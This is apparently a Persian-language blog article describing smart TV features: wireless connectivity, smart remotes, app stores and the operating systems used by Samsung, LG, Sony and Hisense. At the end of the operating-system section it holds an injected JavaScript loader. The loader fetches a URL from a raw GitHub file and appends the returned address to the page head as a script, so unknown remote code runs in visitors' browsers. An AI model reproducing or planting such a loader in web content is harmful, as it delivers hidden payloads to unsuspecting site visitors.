دسته‌بندی نشده

اپشن های تلویزیون هوشمند

امروزه معمولا بیشتر تلویزیون ها به صورت هوشمند ارائه می شوند. تلویزیون های هوشمند کارایی اسان تر و کاربرد بهتری دارند و از زمان عرضه توانسته اند طرفداران بسیاری را به خود جذب کنند. تلویزیون های اسمارت می توانند دنیایی از سرگرمی های گوناگون را برایتان فراهم کند. 

ویژگی های هوشمند و قابلیت های جذابی که در تلویزیون های هوشمند وجود دارد شامل:
دسترسی به اینترنت و وب بروزر برای جستجو اسان در سایت ها و محتویات مختلف
اتصال سریع گوشی های هوشمند به تلویزیون و انتقال محتویات ان ها
منو هوشمند برای دسترسی سریع تر
قابلیت کنترل صوتی
بازی و گیم های مختلف
و سایر برنامه های متنوع و جذاب می باشد. 

ظاهری مرتب و بدون سیم اضافه

در تلویزیون ها قدیمی به دلیل وجود سیم های زیاد که به وسیله ان ها دستگاه های دیجیتالی را به تلویزیون وصل می کردند ظاهری نا منظم و هرج و مرج داشتند. اما با استفاده از تلویزیون های هوشمند و با تعبیه روش های هوشمند برای وصل کردن دستگاه ها و همچنین با استفاده از منظم کننده کابل One Connect Box بر روی قسمت پشتی ان ها ظاهر تلویزیون ها بسیار مرتب تر شده است و جلوه ای زیبا تر در سالن و اتاق ها را ایجاد خواهند کرد. روش های هوشمند مختلفی بر روی تلویزیون های اسمارت وجود دارد که به وسیله ان ها می تواند در مدت زمان کوتاه گوشی های هوشمند مختلف, لپ تاپ و یا دستگاه های دیگر را بدون هیچگونه سیم و کابل اضافه به تلویزیون متصل کنید. 

ریموت کنترل های هوشمند

ریموت کنترل ها در تلویزیون های هوشمند تغییرات زیادی کرده اند. برای مثال در تلویزیون های نسل جدید سامسونگ ریموت کنترل ها به صورت اشاره گر مانند موس کامپیوتر عمل می کنند و دارای کارکرد بسیار اسان تری می باشند و یا در تلویزیون های الجی بر روی ان ها میانبر های فراوانی برای دسترسی سریع به قابلیت های هوشمند تلویزیون مانند نتفلیکس, امازون و … تعبیه شده است. کنترل های اسمارت یا جادویی علاوه بر تلویزیون می توانند سایر دستگاه های متصل شده به تلویزیون را نیز به اسانی کنترل کنند. در برخی از تلویزیون ها ریموت کنترل بر روی گوشی های هوشمند نیز می تواند نصب شود بنابراین با استفاده از گوشی کاربران می توانند کنترل تلویزیون را در دست داشته باشند. نسل جدید تلویزیون های سونی در سال 2022 نیز با قابلیت finder عرضه می شوند. و سامسونگ نیز قصد دارد ریموت کنترل های جدیدش را با قابلیت شارژ از طریق نور خورشید و لامپ و همچنین امواج رادیویی عرضه کند. 

فروشگاه محتویات

در تلویزیون های هوشمند معمولا میزان زیادی از اپلیکیشن ها و محتویات مختلف ارائه می شوند. در هر برندی یک فروشگاه برای دسترسی اسان به محتویات و اپلیکیشن های مختلف بر روی تلویزیون وجود دارد که به اسانی می توان بر روی ان اپ مورد علاقه خود را دانلود و بر روی تلویزیون اجرا کرد. 

سیستم عامل

مهم ترین بخش در تلویزیون های هوشمند سیستم عامل اجرا شده بر روی ان ها می باشد. این پلتفرم ها عامل هوشمند بودن تلویزیون است و امروزه تعدادی از برند ها توانسته اند پلتفرم اختصاصی خود را به اسانی بر روی تلویزیون ها اجرا کنند. این پلتفرم ها کاربردی سریع و اسان دارند و همچنین اپلیکیشن های مختلف و بسیار زیادی را برای تلویزیون فراهم می کنند. در تلویزیون های سامسونگ معمولا از پلتفرم های اندروید و تایزن که مخصوص سامسونگ است استفاده می شوند. تلویزیون های ال جی با سیستم عامل اختصاصی خود WebOS تلویزیون های را ارائه می دهد و تلویزیون های سونی در گذشته بیشتر از سیستم عامل اندروید استفاده می شد اما امروزه با پلتفرم پیشرفته تر یعنی Google tv ارائه می شوند. هایسنس نیز که امروزه محبوبیت زیادی به دست اورده است از سیستم عامل اندروید و بیشتر از ویدا بهره می برد.  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *